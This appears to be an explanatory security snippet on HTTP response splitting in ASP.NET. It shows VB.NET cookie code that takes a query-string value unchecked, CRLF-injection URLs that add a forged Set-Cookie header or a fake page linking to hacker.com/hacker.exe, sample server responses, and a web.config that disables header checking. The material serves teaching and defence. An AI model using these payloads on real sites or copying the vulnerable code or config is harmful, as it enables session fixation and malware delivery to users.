' Builds a cookie named "mycookie" whose value is taken verbatim from the
' "cookie" query-string parameter, then appends it to the response, so
' request-supplied text is written into a Set-Cookie response header.
' NOTE(review): no validation or encoding is applied to the value here. If it
' carries CR/LF (%0D%0A) and httpRuntime enableHeaderChecking is turned off,
' the text after the line break is emitted as a separate header line.
' Reject control characters or URL-encode the value before using it in a cookie.
Dim MyCookie As New HttpCookie("mycookie",Request.Querystring("cookie"))
Response.AppendCookie(mycookie)
http://site/cookies.aspx?cookie=123%0D%0ASet-Cookie%3A%20hackercookie=hacked
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Date: Thu, 5 Mar 2009 14:11:50 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: mycookie=123
Cache-Control: private
Content-Type: text/html; charset=utf-8
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Date: Thu, 5 Mar 2009 14:11:50 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: mycookie=123
Set-Cookie: hackercookie=hacked
Cache-Control: private
Content-Type: text/html; charset=utf-8
http://thesite.com/something.aspx?id=9999%0d%0a Content-Length:+22%0d%0a%0d%0a<html>%0d%0a<a href=www.hacker.com/hacker.exe> Please update first </a>%0d%0a</html>%0d%0aHTTP/1.1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Date: Thu, 20 Sep 2007 20:11:50 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: mycookie=123%0D%0ASet-Cookie:HackedCookie=Hacked
Cache-Control: private
Content-Type: text/html; charset=utf-8
<configuration>
  <system.web>
    <!-- enableHeaderChecking="false" switches off ASP.NET's encoding of
         carriage-return / line-feed characters in response header values.
         With the check left on (the framework default), an injected line
         break is written out as %0D%0A inside the header value instead of
         starting a new header line. Keep the attribute at its default in
         deployed applications, and validate request data before it reaches
         any header or cookie regardless of this setting. -->
    <httpRuntime enableHeaderChecking="false" />
  </system.web>
</configuration>